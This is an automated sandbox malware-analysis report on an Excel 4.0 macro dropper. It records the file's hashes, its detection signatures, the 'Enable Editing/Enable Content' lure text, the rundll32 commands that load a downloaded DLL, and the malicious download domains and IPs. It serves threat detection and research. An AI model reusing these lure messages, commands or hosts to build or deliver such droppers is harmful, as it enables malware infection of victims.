Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report diagram-419065597.xls

Overview

General Information

Sample Name:diagram-419065597.xls
Analysis ID:412973
MD5:ec968745c407ee67d80d18c25abaa8d2
SHA1:922818d6a781b3780541837975c54baa4e7a3349
SHA256:431c2a2e6969ba3aa239af68c3150d86837b3e58bc80b2690b91cf39d459ac55
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1984 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2672 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 648, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 1984

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: diagram-419065597.xlsReversingLabs: Detection: 14%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 108.167.180.130:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.91.198.131:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: stateoftheartacademy.com.br
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 108.167.180.130:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 108.167.180.130:443
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: stateoftheartacademy.com.br
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownHTTPS traffic detected: 108.167.180.130:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.91.198.131:443 -> 192.168.2.22:49170 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas' " ' "
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 2 Once You have Enable Editing, please click
Source: Screenshot number: 8Screenshot OCR: Enable Content 14 , from the yellow bar above 15 D e 16 17 I 18 I WHY I CANNOT OPEN THIS DOCUME
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: diagram-419065597.xlsInitial sample: CALL
Source: diagram-419065597.xlsInitial sample: CALL
Source: diagram-419065597.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: diagram-419065597.xlsInitial sample: Sheet size: 14900
Source: diagram-419065597.xlsOLE indicator, VBA macros: true
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\89EE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDF27.tmpJump to behavior
Source: diagram-419065597.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: diagram-419065597.xlsReversingLabs: Detection: 14%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
diagram-419065597.xls15%ReversingLabsDocument-Office.Downloader.EncDoc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
stateoftheartacademy.com.br0%VirustotalBrowse
dsafarm.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
stateoftheartacademy.com.br
108.167.180.130
truefalseunknown
dsafarm.com
208.91.198.131
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpfalse
    		high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpfalse
      		high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpfalse
        		high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpfalse
          		high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpfalse
            		high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmpfalse
              		high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              108.167.180.130
              		stateoftheartacademy.com.brUnited States
              		46606UNIFIEDLAYER-AS-1USfalse
              208.91.198.131
              		dsafarm.comUnited States
              		394695PUBLIC-DOMAIN-REGISTRYUSfalse

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:412973
              Start date:13.05.2021
              Start time:05:15:16
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 19s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:diagram-419065597.xls
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.expl.evad.winXLS@5/11@2/2
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xls
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.42, 205.185.216.10, 93.184.221.240
              • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
              • Report size getting too big, too many NtDeviceIoControlFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              108.167.180.130EFT Remittance Details.vbsGet hashmaliciousBrowse
                208.91.198.131240000434383.doc.jsGet hashmaliciousBrowse
                  240000434383.doc.jsGet hashmaliciousBrowse

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    PUBLIC-DOMAIN-REGISTRYUSPRODUCT RANGE # 363688.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    #Ud83d#Udce0Lori's Fax VM-002.htmlGet hashmaliciousBrowse
                    • 199.79.62.225
                    PRODUCT INQUIRY FROM PAKISTAN.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    tLes2JdtRw.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    SecuriteInfo.com.Malware.AI.4228845530.13946.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Letter of Demand.docGet hashmaliciousBrowse
                    • 103.21.59.173
                    7b4NmGxyY2.exeGet hashmaliciousBrowse
                    • 162.215.241.145
                    catalog-1908475637.xlsGet hashmaliciousBrowse
                    • 199.79.62.12
                    catalog-1908475637.xlsGet hashmaliciousBrowse
                    • 199.79.62.12
                    INV74321.exeGet hashmaliciousBrowse
                    • 119.18.54.126
                    NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                    • 116.206.104.92
                    #10052021.exeGet hashmaliciousBrowse
                    • 116.206.104.66
                    shipping docs and BL_pdf.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    PDF.9066721066.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Payment Advice Note from 10.05.2021 to 608760.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                    • 162.222.225.153
                    551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                    • 162.222.225.153
                    export of document 555091.xlsmGet hashmaliciousBrowse
                    • 103.21.58.29
                    RFQ-20283H.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    BTC-2021.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    UNIFIEDLAYER-AS-1USe09ca2b3_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    a46eb47f_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    aabc6e16_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    6f75ecf8_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    2a9335bd_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    3e917917_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    73f69405_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    4ebc60e0_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    eacf01bf_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    aabc6e16_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    dd9d35c4_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    a46eb47f_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    3e917917_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    6f75ecf8_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    eacf01bf_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    73f69405_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    4ebc60e0_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    dd9d35c4_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    504acdb7_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225
                    27e9ef61_by_Libranalysis.dllGet hashmaliciousBrowse
                    • 162.241.209.225

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406bACH WIRE PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    85095f36_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    Product specification.xlsxGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    statistic-482095214.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    7bYDInO.rtfGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    catalog-1908475637.xlsGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    DHL AWB.xlsxGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    QTFsui5pLN.xlsmGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    15j1TCnOiA.xlsmGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131
                    Purchase Agreement.docxGet hashmaliciousBrowse
                    • 108.167.180.130
                    • 208.91.198.131

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                    Category:dropped
                    Size (bytes):59863
                    Entropy (8bit):7.99556910241083
                    Encrypted:true
                    SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                    MD5:15775D95513782F99CDFB17E65DFCEB1
                    SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                    SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                    SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                    Malicious:false
                    Reputation:moderate, very likely benign file
